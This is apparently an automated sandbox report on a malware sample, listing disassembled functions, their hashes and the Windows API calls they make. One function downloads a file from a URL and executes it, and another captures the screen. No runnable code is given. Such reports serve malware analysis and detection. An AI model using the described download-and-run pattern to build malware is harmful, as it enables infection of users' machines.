Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce41f44052cce29bac52810b9e13bbc969e5db1d69c4b3b60dcc792702b52353
Instruction ID: b0cce46dee9d217b11c77cb1dc622b0019c6624853319a2e579037b5b45917cb
Opcode Fuzzy Hash: ce41f44052cce29bac52810b9e13bbc969e5db1d69c4b3b60dcc792702b52353
Instruction Fuzzy Hash: 7C62149698E7C14FE7178B704D7A295BF70AA2321471E86CFC4C28B8A3D64C994BC717

Function 004373C9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
Instruction ID: 417346d0ae02fd64553672aa1fcdcaceb5e3fedd873b6eafe9f940146e5e92a3
Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
Instruction Fuzzy Hash: 7A324762D69F014DE7339634C822336A298AFBB3D4F15E737E855B5EA6EB2CC4834105

Function 004071A1 Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebf0f661293fed6f0198fb6f641b6861ec7cf69259610056928f344a4eefe150
Instruction ID: cfe2422a6546bef1f61d45af2200ef59159d57cedd5e010ca0acbe3f63374a03
Opcode Fuzzy Hash: ebf0f661293fed6f0198fb6f641b6861ec7cf69259610056928f344a4eefe150
Instruction Fuzzy Hash: 0CE1A570A08616EFD714CF28C590AA6B7F1FF48304B14456EE842ABB91D738FC61DB96

Function 021176DB Relevance: .4, Instructions: 356COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e141dac8b757437fae1aeddb961bff7ddd32a56cbd136b19ae957eab17c051c5
Instruction ID: 352182cf5c6a4f3d1cda86457dedce80c298091b16efe07b5236f2780f349a1d
Opcode Fuzzy Hash: e141dac8b757437fae1aeddb961bff7ddd32a56cbd136b19ae957eab17c051c5
Instruction Fuzzy Hash: 30D1D8321481A30AD76D4A39847403AFFE26A421A530E87BDD4F7CB6C6EF34D555D660

Function 00427D57 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 53b12877abe9f5bd80a2a3f521651de355e01c50a7045b8389fd82b7b4b17ed8
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 5B91627230D0B34ADB294639953503FFFE15A523A139A079FE4F2CA2C5EE288965D624

Function 02117FBE Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 21006bea250446e4376bc7d0d9447500e2d1b7ed2de2abfd64a91fa0b39285b1
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 89913E732490A34EEB6E463A847413EFFE15A422A530B47BEE4F2CA1C5EF34C565D620

Function 00428012 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 840c7d605cd247ab055e93d746b7d566013b7b825f8c517892cae8bc4eeb6456
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 6991637230A0B34EDB694639A53403FFFE15A523A135A079FD4F2CB2C5EE1C8965D624

Function 02118279 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: a5334dc0fc29b9d9230cc306f295deb3eb2b3c424d67eef013544ff7306bd3af
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 6C912C721490A34AFB6E467A857413EFFE15A422A530B47BAE4F2CA5C5FF34C164D620

Function 00427A90 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 65de86ff63b49bdc759aa5d57c760241c770973215aaf00ccaa693d1692859fd
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 8A91527230D0B34ADB2D463AA47403FFFE15A523B135A079FD4F2CA2C5EE189A55D624

Function 02117CF7 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 8c250b122d700287abf413eb51a23b020659e4c947e606e5f037da407d78ae93
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: D49182722490A30EEB6E4639857413EFFE15A421A571A07BEE4F2CE2C5FF34C566D620

Function 0042D4DE Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc31d320c795f004d24ba8341ded4eebeb73840abc836b894b4ba362e903035c
Instruction ID: d33dadf552dc057ac98c398fef9b4cf1a6c5eb0b8cd52ebb4b7201ad2176a4fd
Opcode Fuzzy Hash: fc31d320c795f004d24ba8341ded4eebeb73840abc836b894b4ba362e903035c
Instruction Fuzzy Hash: 446157B1F0063576DA385A28B895BBF63949F41748FE0041FE446DB381DA9DED82864E

Function 0211D745 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
Instruction ID: 94cd42058a0410f598f9c95a2ccfe35e623b129576b37da57031c085e5989a3f
Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
Instruction Fuzzy Hash: 6C6169726C07096ADF3CAA6CB891BBE63959F41B0CF040839D983DB2C0E731D942CB56

Function 004277E6 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 93cadbc9e56ee973348f3b1b45f0aee1066a3e574f5d0b7d1e0efa6f5899e2a2
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 8581637230D1B34AEB294239957843FFFE15A523A135A079FD4F2CA2C1EE18CA55D624

Function 02117A4D Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 7a073e421e0c4fc94a9a91437520ccc5861f4b3d27551c96eedb20c28b28f722
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: F28165722490A34AEB6E463A857453EFFE15A411A530A07BEE4F3CB2C5FF34D256D620

Function 00428550 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 140c30f2401bdd3d55fd39f42844b97d2838e8a2e1dc8557d0850e1b510d1eed
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: B211297730306167D6148A2DF8B45BFA795EAD53207EC426FD0414B744CE2AE9C19508

Function 021187B7 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 44443f6f88a0b9179fafc402b945d55e23903c70cc155102c0c299fa49bd1101
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 6E11E7BB2C004247F658CA2DD8B42BBA796EFC5228B2FC37AD0414B758DB32A145D600

Function 00560083 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3754052818.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_560000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 29bfb10d88391ccec3fe152b2c6d4930e0991c36eb5a02545870fb5626a4168a
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 98119A72340100AFDB40DE55DC85FA777EAFB89320B298065E908CB352D676E802C760

Function 020F0D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 4524214b148ab43ddff2c3a4e56364f4d43a0700c24f520c9d4403447d2986ae
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: DF01F7736517008FDFA1CF20C804BAA33E6FBC5206F0540A4DA0697646E370A8418B80

Function 004020F0 Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000014,?,?), ref: 0040212B
GetClientRect.USER32(?,?), ref: 00402140
GetDC.USER32(?), ref: 00402147
CreateSolidBrush.GDI32(00646464), ref: 0040215A
SelectObject.GDI32(00000000,00000000), ref: 0040216E
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402179
SelectObject.GDI32(00000000,00000000), ref: 00402187
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0040219A
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021A5
MulDiv.KERNEL32(00000008,00000000), ref: 004021AE
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021D2
SelectObject.GDI32(00000000,00000000), ref: 004021E0
SetBkMode.GDI32(?,00000001), ref: 0040225D
SetTextColor.GDI32(?,00000000), ref: 0040226C
_wcslen.LIBCMT ref: 00402275

Strings

Tahoma, xrefs: 004021B4

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
String ID: Tahoma
API String ID: 3832963559-3580928618
Opcode ID: 33b9b76472e38ae72e1de4aa9982544c59de680f6868419fd236333dfe6a8388
Instruction ID: 93c85de950fa204d17176c6e5f5269daa7db8447991b35657298edc932ea58e6
Opcode Fuzzy Hash: 33b9b76472e38ae72e1de4aa9982544c59de680f6868419fd236333dfe6a8388
Instruction Fuzzy Hash: FD710072900228AFDB22DF64DD85FAEB7BCEF09711F0041A5B609E6155DA74AF80CF54

Function 00402567 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 186windowkeyboardfileCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?), ref: 004025C3
DefWindowProcW.USER32(?,00000204,?,?), ref: 004025D5
ReleaseCapture.USER32 ref: 004025E8
GetDC.USER32(00000000), ref: 0040260F
CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 00402696
CreateCompatibleDC.GDI32(?), ref: 0040269F
SelectObject.GDI32(00000000,00000000), ref: 004026A9
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026D7
ShowWindow.USER32(?,00000000), ref: 004026E0
GetTempPathW.KERNEL32(00000104,?), ref: 004026F2
GetTempFileNameW.KERNEL32(?,hef,00000000,?), ref: 0040270D
DeleteFileW.KERNEL32(?), ref: 00402727
DeleteDC.GDI32(00000000), ref: 0040272E
DeleteObject.GDI32(00000000), ref: 00402735
ReleaseDC.USER32(00000000,?), ref: 00402743
DestroyWindow.USER32(?), ref: 0040274A
SetCapture.USER32(?), ref: 00402797
GetDC.USER32(00000000), ref: 004027CB
ReleaseDC.USER32(00000000,00000000), ref: 004027E1
GetKeyState.USER32(0000001B), ref: 004027EE
DestroyWindow.USER32(?), ref: 00402803

Strings

hef, xrefs: 00402701

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
String ID: hef
API String ID: 2545303185-98441221
Opcode ID: c1ac1bd017a9acd203bd2fc245b57fc6318294ea1881e019892625608c4a2c2b
Instruction ID: 592aba8080b11a69c6e8af25da0e3a71807a27334faeadba24c5a0a63d01ebad
Opcode Fuzzy Hash: c1ac1bd017a9acd203bd2fc245b57fc6318294ea1881e019892625608c4a2c2b
Instruction Fuzzy Hash: 5B61A3B5900219AFCB24AF64DD48BAA7BB8FF48706F044179F605E22A1D7B4DA41CB1C

Function 0042E6A2 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0042E712
_free.LIBCMT ref: 0042E728
_free.LIBCMT ref: 0042E739
_free.LIBCMT ref: 0042E74A
_free.LIBCMT ref: 0042E761
GetCPInfo.KERNEL32(?,?), ref: 0042E7A9

Part of subcall function 004366DB: _free.LIBCMT ref: 00436746

_free.LIBCMT ref: 0042E955
_free.LIBCMT ref: 0042E968
_free.LIBCMT ref: 0042E976
_free.LIBCMT ref: 0042E981
_free.LIBCMT ref: 0042E9C3
_free.LIBCMT ref: 0042E9CB
_free.LIBCMT ref: 0042E9D3
_free.LIBCMT ref: 0042E9DB
_free.LIBCMT ref: 0042E9E9

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 3c8bd96b14d453fc78fbdfa0c935f0ea1f368fed7a7b63a3d2dca3ea6bd9dcea
Instruction ID: 00ca1cae550ae33e56ff2d48992555244a41b63278d5bed064242715bcfe7aee
Opcode Fuzzy Hash: 3c8bd96b14d453fc78fbdfa0c935f0ea1f368fed7a7b63a3d2dca3ea6bd9dcea
Instruction Fuzzy Hash: 45B1CFB1E002159EEB11DF66C841BEEBBB4FF08304F54446FF999A7342D739A9418B28

Function 0211E909 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0211E979
_free.LIBCMT ref: 0211E98F
_free.LIBCMT ref: 0211E9A0
_free.LIBCMT ref: 0211E9B1
_free.LIBCMT ref: 0211E9C8
GetCPInfo.KERNEL32(?,?), ref: 0211EA10

Part of subcall function 02126942: _free.LIBCMT ref: 021269AD

_free.LIBCMT ref: 0211EBBC
_free.LIBCMT ref: 0211EBCF
_free.LIBCMT ref: 0211EBDD
_free.LIBCMT ref: 0211EBE8
_free.LIBCMT ref: 0211EC2A
_free.LIBCMT ref: 0211EC32
_free.LIBCMT ref: 0211EC3A
_free.LIBCMT ref: 0211EC42
_free.LIBCMT ref: 0211EC50

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction ID: 1018e739841a9b1ff54a6dea256a890280db4c3c3612733b15d3d8125ead51c7
Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction Fuzzy Hash: 99B1BE71D402099FDB21DFA8C880BEEBBF9BF08304F144569F899A7291DB35A855CF60

Function 0043A5E8 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0043A62C

Part of subcall function 0043997B: _free.LIBCMT ref: 00439998
Part of subcall function 0043997B: _free.LIBCMT ref: 004399AA
Part of subcall function 0043997B: _free.LIBCMT ref: 004399BC
Part of subcall function 0043997B: _free.LIBCMT ref: 004399CE
Part of subcall function 0043997B: _free.LIBCMT ref: 004399E0
Part of subcall function 0043997B: _free.LIBCMT ref: 004399F2
Part of subcall function 0043997B: _free.LIBCMT ref: 00439A04
Part of subcall function 0043997B: _free.LIBCMT ref: 00439A16
Part of subcall function 0043997B: _free.LIBCMT ref: 00439A28
Part of subcall function 0043997B: _free.LIBCMT ref: 00439A3A
Part of subcall function 0043997B: _free.LIBCMT ref: 00439A4C
Part of subcall function 0043997B: _free.LIBCMT ref: 00439A5E
Part of subcall function 0043997B: _free.LIBCMT ref: 00439A70

_free.LIBCMT ref: 0043A621

Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482

_free.LIBCMT ref: 0043A643
_free.LIBCMT ref: 0043A658
_free.LIBCMT ref: 0043A663
_free.LIBCMT ref: 0043A685
_free.LIBCMT ref: 0043A698
_free.LIBCMT ref: 0043A6A6
_free.LIBCMT ref: 0043A6B1
_free.LIBCMT ref: 0043A6E9
_free.LIBCMT ref: 0043A6F0
_free.LIBCMT ref: 0043A70D
_free.LIBCMT ref: 0043A725

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: 592e84a200b8bfd7e94acad550198685aeb7160705af9e7bc43cea000efe3ccb
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: A4316D31A002019FEB229B3AD846B5773E8FF18315F18A41FE4D986251DB39AD508B19

Function 0212A84F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0212A893

Part of subcall function 02129BE2: _free.LIBCMT ref: 02129BFF
Part of subcall function 02129BE2: _free.LIBCMT ref: 02129C11
Part of subcall function 02129BE2: _free.LIBCMT ref: 02129C23
Part of subcall function 02129BE2: _free.LIBCMT ref: 02129C35
Part of subcall function 02129BE2: _free.LIBCMT ref: 02129C47
Part of subcall function 02129BE2: _free.LIBCMT ref: 02129C59
Part of subcall function 02129BE2: _free.LIBCMT ref: 02129C6B
Part of subcall function 02129BE2: _free.LIBCMT ref: 02129C7D
Part of subcall function 02129BE2: _free.LIBCMT ref: 02129C8F
Part of subcall function 02129BE2: _free.LIBCMT ref: 02129CA1
Part of subcall function 02129BE2: _free.LIBCMT ref: 02129CB3
Part of subcall function 02129BE2: _free.LIBCMT ref: 02129CC5
Part of subcall function 02129BE2: _free.LIBCMT ref: 02129CD7

_free.LIBCMT ref: 0212A888

Part of subcall function 021236C1: HeapFree.KERNEL32(00000000,00000000,?,0212A34F,?,00000000,?,00000000,?,0212A5F3,?,00000007,?,?,0212A9E7,?), ref: 021236D7
Part of subcall function 021236C1: GetLastError.KERNEL32(?,?,0212A34F,?,00000000,?,00000000,?,0212A5F3,?,00000007,?,?,0212A9E7,?,?), ref: 021236E9

_free.LIBCMT ref: 0212A8AA
_free.LIBCMT ref: 0212A8BF
_free.LIBCMT ref: 0212A8CA
_free.LIBCMT ref: 0212A8EC
_free.LIBCMT ref: 0212A8FF
_free.LIBCMT ref: 0212A90D
_free.LIBCMT ref: 0212A918
_free.LIBCMT ref: 0212A950
_free.LIBCMT ref: 0212A957
_free.LIBCMT ref: 0212A974
_free.LIBCMT ref: 0212A98C

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: 5eda400b6dbb60a59568c60552218169a07acc1c62668631395d3c04a597964f
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: B3317031A807259FEF21AF39E844B5677E9BF00311F104869F458D7260DB35A97ACB94

Function 00439A79 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439AC1
_free.LIBCMT ref: 00439AE5
_free.LIBCMT ref: 00439AF2
_free.LIBCMT ref: 00439B17
_free.LIBCMT ref: 00439B24
_free.LIBCMT ref: 00439B2D
_free.LIBCMT ref: 00439E0B
_free.LIBCMT ref: 00439E13

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction ID: 1e1df55711acecdaceb3f6a2bcf6b580ecd3898991ab0d8f2f462f5a0a61d494
Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction Fuzzy Hash: 75C174B2D40205BBEB20DBA8CC43FEB77B8AB0C705F15515AFA05FB286D6B49D418B54

Function 020F2C51 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 134filenetworksynchronizationCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 020F2C74
InternetOpenUrlW.WININET(00000000,0045D818,00000000,00000000,00000000,00000000), ref: 020F2C8A
GetTempPathW.KERNEL32(00000105,?), ref: 020F2CA6
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 020F2CBC
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 020F2CF5
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 020F2D31
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 020F2D4E
ShellExecuteExW.SHELL32(?), ref: 020F2DC5
WaitForSingleObject.KERNEL32(?,00008000), ref: 020F2DDA

Strings

<, xrefs: 020F2DA2

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: <
API String ID: 838076374-4251816714
Opcode ID: 9bf731035bfec187241e890923bec375076f7805f2a0f07ea48903a7d88d49b3
Instruction ID: 0aba003da67ebacb83acaa71f5798f3609bcde6e515c98b0a97613271d8b9598
Opcode Fuzzy Hash: 9bf731035bfec187241e890923bec375076f7805f2a0f07ea48903a7d88d49b3
Instruction Fuzzy Hash: D7415E7294021DAFEB619F609C85FEAB7FCFF04705F0080E6A649E2150DB709E858FA4

Function 0210EEB2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C03,000000FF,?,0210F218,00000004,02107D77,00000004,02108059), ref: 0210EEE9
GetLastError.KERNEL32(?,0210F218,00000004,02107D77,00000004,02108059,?,02108789,?,00000008,02107FFD,00000000,?,?,00000000,?), ref: 0210EEF5
